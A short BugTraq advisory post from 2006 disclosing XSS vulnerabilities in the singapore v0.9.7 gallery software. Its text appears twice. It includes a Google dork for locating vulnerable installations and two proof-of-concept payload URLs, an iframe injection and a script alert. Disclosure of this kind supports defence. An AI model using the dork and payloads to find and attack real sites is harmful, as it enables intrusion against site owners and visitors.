BugTraq
Back to list
|
Post reply
singapore v0.9.7 XSS Vulnerabilities
May 08 2006 07:25AM
alp_eren ayyildiz org
SOFTWARE:
=========
singapore v0.9.7
DESCRIPTION:
============
The system is vulnerable to various XSS attacks
google dork : "Powered by singapore v0.9.7" inurl:index.php?gallery
429 results :)
xss code example
================
www.site.com/images/index.php?gallery=[gallery name]&image=<iframe%20src="http://www.yoursite.com">
www.site.com/images/index.php?gallery=[gallery name]&image=<script>alert("lol")<script>
mail: alp_eren[at]ayyildiz[dot]com
web : http://www.ayyildiz.org
greets to thehacker,iskorpitx,suskun,shadow, and all AYT member
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
=========
singapore v0.9.7
DESCRIPTION:
============
The system is vulnerable to various XSS attacks
google dork : "Powered by singapore v0.9.7" inurl:index.php?gallery
429 results :)
xss code example
================
www.site.com/images/index.php?gallery=[gallery name]&image=<iframe%20src="http://www.yoursite.com">
www.site.com/images/index.php?gallery=[gallery name]&image=<script>alert("lol")<script>
mail: alp_eren[at]ayyildiz[dot]com
web : http://www.ayyildiz.org
greets to thehacker,iskorpitx,suskun,shadow, and all AYT member
[ reply ]